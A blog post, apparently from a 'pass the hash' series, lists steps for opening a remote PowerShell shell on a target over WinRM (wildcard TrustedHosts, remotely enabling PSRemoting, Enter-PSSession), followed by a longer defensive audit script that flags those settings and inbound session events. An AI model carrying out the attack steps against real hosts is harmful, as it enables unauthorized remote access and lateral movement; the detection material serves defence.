Last post in the "pass the hash" series.
In the first one we used a remote RDP console.
We then demonstrated a netcat reverse shell.
What if we don't have RDP, or can't (or don't want to) run netcat against the remote target?
WinRM to the rescue!
1. Ensure WinRM is set up on the attacker host: winrm quickconfig
2. Add trusted hosts * (or filter to an IP) on the attacker host: powershell "Set-Item WSMan:\localhost\Client\TrustedHosts -Value '*' -Force"
3. Enable PSRemoting on the remote target host (use wmic / see previous article): powershell.exe "Enable-PSRemoting -Force"
4. Add trusted hosts * (or filter to an IP) on the attacker host: powershell "Set-Item WSMan:\localhost\Client\TrustedHosts -Value '*' -Force" (use wmic / see previous article)
5. Enjoy a remote shell under PowerShell (from the attacker host): Enter-PSSession -ComputerName target
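Every step above leaves a configuration trace on the machine it touches: a running WinRM service, a listener, a TrustedHosts value and, on the target, WinRM session-creation events. The audit script below is an added example written for this post (it is not code from the original walkthrough); it reviews exactly those settings on a host and reports the ones that should be tightened. The event ID 91 filter assumes the Microsoft-Windows-WinRM/Operational log's server-side "Creating WSMan Session" event, and the WSMan: drive checks assume the WinRM service is running, which is why they sit in try/catch.

```powershell
# Added audit script (not from the original post): reviews the WinRM settings the
# walkthrough above changes and flags the ones a defender should tighten.
# Run in an elevated PowerShell on the host being checked.

function Test-WinRMExposure {
    [CmdletBinding()]
    param(
        # How far back to look for inbound WinRM session creations.
        [int]$LookbackDays = 7
    )

    $findings = New-Object System.Collections.Generic.List[object]
    function Add-Finding([string]$Severity, [string]$Area, [string]$Detail, [string]$Fix) {
        $findings.Add([pscustomobject]@{ Severity = $Severity; Area = $Area; Detail = $Detail; Fix = $Fix })
    }

    # 1. Service state: if WinRM is not running, nothing below is reachable anyway.
    $svc = Get-Service -Name WinRM -ErrorAction SilentlyContinue
    if (-not $svc -or $svc.Status -ne 'Running') {
        Add-Finding 'Info' 'Service' 'WinRM service is not running; remoting checks skipped.' 'No action needed.'
        return $findings
    }
    Add-Finding 'Info' 'Service' "WinRM service is running (StartType: $($svc.StartType))." `
        'Confirm this host is meant to accept remote management.'

    # 2. TrustedHosts: a wildcard lets this client authenticate to ANY WinRM endpoint
    #    with explicit credentials, which is what step 2/4 of the walkthrough relies on.
    try {
        $trusted = (Get-Item WSMan:\localhost\Client\TrustedHosts -ErrorAction Stop).Value
        if ($trusted -eq '*') {
            Add-Finding 'High' 'TrustedHosts' 'TrustedHosts is "*" (any host is trusted).' `
                "Set-Item WSMan:\localhost\Client\TrustedHosts -Value '' -Force, or list only the management hosts you need."
        } elseif ($trusted -match '\*') {
            Add-Finding 'Medium' 'TrustedHosts' "TrustedHosts contains a wildcard pattern: $trusted" `
                'Replace the pattern with explicit hostnames or IPs.'
        } elseif ($trusted) {
            Add-Finding 'Low' 'TrustedHosts' "TrustedHosts is explicit: $trusted" 'Review the list periodically.'
        }
    } catch {
        Add-Finding 'Info' 'TrustedHosts' "Could not read TrustedHosts: $($_.Exception.Message)" ''
    }

    # 3. Listeners: an HTTP listener bound to all addresses is the default result of
    #    Enable-PSRemoting / winrm quickconfig (steps 1 and 3 above).
    try {
        foreach ($listener in Get-ChildItem WSMan:\localhost\Listener -ErrorAction Stop) {
            $props     = Get-ChildItem $listener.PSPath
            $transport = ($props | Where-Object Name -eq 'Transport').Value
            $address   = ($props | Where-Object Name -eq 'Address').Value
            $port      = ($props | Where-Object Name -eq 'Port').Value
            $sev = if ($transport -eq 'HTTP' -and $address -eq '*') { 'Medium' } else { 'Low' }
            Add-Finding $sev 'Listener' "$transport listener on $address`:$port" `
                'Prefer HTTPS and restrict the listening address or firewall rule to management subnets.'
        }
    } catch {
        Add-Finding 'Info' 'Listener' "Could not enumerate listeners: $($_.Exception.Message)" ''
    }

    # 4. Recent inbound sessions: Microsoft-Windows-WinRM/Operational event 91 is written
    #    on the server side when a remote WSMan session (e.g. Enter-PSSession) is created.
    #    Get-WinEvent throws when no events match, hence SilentlyContinue.
    $since  = (Get-Date).AddDays(-$LookbackDays)
    $events = Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-WinRM/Operational'; Id = 91; StartTime = $since
    } -ErrorAction SilentlyContinue
    if ($events) {
        $summary = $events | Group-Object -Property { $_.Properties[0].Value } |
            ForEach-Object { "$($_.Name) x$($_.Count)" }
        Add-Finding 'Info' 'Sessions' "$($events.Count) inbound WinRM session(s) in the last $LookbackDays day(s): $($summary -join '; ')" `
            'Correlate with Security 4624 (logon type 3) and your change records; investigate unexpected sources.'
    } else {
        Add-Finding 'Info' 'Sessions' "No inbound WinRM sessions logged in the last $LookbackDays day(s)." ''
    }

    return $findings
}

# Usage: print the findings, most severe first.
Test-WinRMExposure |
    Sort-Object { @{ High = 0; Medium = 1; Low = 2; Info = 3 }[$_.Severity] } |
    Format-Table Severity, Area, Detail, Fix -Wrap
```

The script only reads state; the remediation commands are carried in the Fix column so an operator can decide per host. Pair it with a scheduled collection of event 91 (and the matching Security 4624 logon type 3 events) on hosts that are not expected to be managed over WinRM, since a freshly enabled listener plus a first-ever inbound session on such a host is the signature of the procedure above.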